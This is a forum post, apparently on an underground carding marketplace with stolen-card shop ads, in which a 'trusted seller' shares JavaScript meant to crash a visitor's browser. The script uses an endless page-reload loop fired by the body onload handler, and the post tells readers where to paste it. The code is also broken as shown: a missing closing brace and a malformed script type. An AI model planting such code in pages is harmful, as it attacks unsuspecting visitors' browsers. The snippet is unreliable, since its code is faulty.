Ad End 1 August 2026
banner Expire 20 August 2026
banner Expire 15 January 2025
banner Expire 20 August 2026
ad End 17 September 2026
banner Expire 27 September 2026
adv exp at 20 OCtober  2026
banner Expire 25 July 2025
What's new
Ad expires at 11 August 2026
Ads end 31 October 2026
Ad expires at 25 August 2026
RonalClub cc shop
Patrick Stash
Luki Crown
Wizard's shop 2.0
best shop
Ads end 31 October 2026
best shop

File_closed07

TRUSTED VERIFIED SELLER
Staff member
Joined
Jun 13, 2020
Messages
8,091
Reaction score
1,083
Points
212
Awards
2
  • trusted user
  • Rich User
Hi this is very simple javascript code to crash the client browser. If you don’t know about javascript ,visit www.w3schools.com(i learn lot of languages quickly there).

<script type=’javascript’>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>
This code will reload the page again and again for infintive time and crash the browser.
How to use it? Paste the above code in header section. When page is loaded,the page will reload. For that use onload handling in body as attribute. can’t get you ?
Just see this example:
<body onload=’crash()’>
The complete cod is:

<html>
<head>
<script type=’javascript’>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>
</head>
<body onload=’crash()’>
</body>
</html>
 
Ad End 1 November 2024
Top